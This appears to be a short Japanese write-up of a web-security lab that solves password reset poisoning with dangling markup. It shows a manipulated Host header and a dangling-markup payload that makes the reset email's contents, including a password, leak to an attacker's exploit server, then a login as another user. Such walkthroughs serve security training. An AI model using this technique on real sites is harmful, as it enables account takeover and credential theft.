Hello there, ('ω')ノ
ダングリングマークアップによるパスワードリセットポイズニング
このラボは、 パスワードリセットポイズニングに対して脆弱で。
まずは、ページにアクセスしてパスワードリセットを。
エクスプロイトサーバのメールクライアントを開くと。
メール内のリンクはログインページで。
URLには、パスワードリセットトークンも含まれていなくて。
メールの本文は、下記のとおりで。
リクエストをリピータへ。
Hostヘッダを変更するとサーバエラーが。
ただし、Hostヘッダのポートに数値以外を追加すると正常に処理されて。
Host: ac261fce1e5ac53a80ef174800de00a5.web-security-academy.net:localhost
メールクライアントを確認するとしっかりと届いていて。
パスワードも届いていて。
本文を確認するとエスケープされていない単一引用符で囲まれているので。
<a href='https://ac261fce1e5ac53a80ef174800de00a5.web-security-academy.net:localhost/login'>
エクスプロイトサーバのURLをコピーして。
下記のようなペイロードを挿入して、ユーザも変更してSendすると。
'<a href="//ac9f1f321e73c58380c81745015700b5.web-security-academy.net/?
ログを確認すると下記のパスワードが確認できて。
8zBAUpuiHJ
当然ながらメールは届かず。
carlosでログインすると。
クリアできた。
Best regards, (^^ゞ